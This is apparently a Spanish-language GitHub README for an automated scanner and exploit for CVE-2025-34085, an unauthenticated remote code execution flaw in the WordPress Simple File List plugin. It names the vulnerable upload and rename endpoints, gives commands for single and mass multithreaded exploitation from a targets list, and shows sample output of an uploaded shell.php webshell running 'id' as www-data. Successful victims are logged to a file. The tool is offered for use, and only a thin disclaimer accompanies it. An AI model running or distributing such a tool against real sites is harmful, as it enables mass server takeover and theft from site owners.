
Escáner y exploit automatizado para CVE-2025-34085, una RCE no autenticada en el plugin WordPress Simple File List. Admite escaneo de múltiples objetivos, carga de webshell y ejecución remota de comandos.
Herramienta automática para detectar y explotar Remote Code Execution (RCE) no autenticado en el plugin WordPress Simple File List, especialmente vulnerable a CVE-2025-34085.
Equipado con un sistema de limpieza automática de objetivos y soporte multihilo para ser eficiente a gran escala.
Subida de archivo sin autenticación
/wp-content/plugins/simple-file-list/ee-upload-engine.phpRenombrar archivo a .php
/wp-content/plugins/simple-file-list/ee-file-engine.phpEjecución remota del payload
python3 main.py -u http://target.com --cmd "id"
Coloca la lista de objetivos en el archivo targets.txt, uno por línea:
python3 main.py --cmd "uname -a"
| Argumento | Descripción |
|---|---|
-u | Objetivo único (ejemplo: http://example.com) |
--cmd | Comando a ejecutar en el objetivo (predeterminado: id) |
--inline | Usar payload inline (sin parámetro ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Los objetivos exitosos se guardarán automáticamente en el archivo vuln.txt.
main.py — Script principaltargets.txt — Lista de objetivosclean_targets.txt — Resultado de normalización de URLvuln.txt — Registro de objetivos explotados con éxitotargets.txtSe recomienda a los administradores de sitios WordPress:
Este proyecto es solo para aprendizaje y pruebas legítimas.
El uso con fines ilegales es responsabilidad de cada individuo.
Cyberlone Indonesia no se responsabiliza por el mal uso de esta herramienta.
Licencia: MIT License
Siéntase libre de usar, modificar y distribuir para fines legítimos y responsables.
Cyberlone Indonesia
🛠️ Equipo de Investigación y Explotación
🔗 GitHub: https://github.com/yukinime
👨💻 0xgh057r3c0n
🔗 GitHub: github.com/0xgh057r3c0n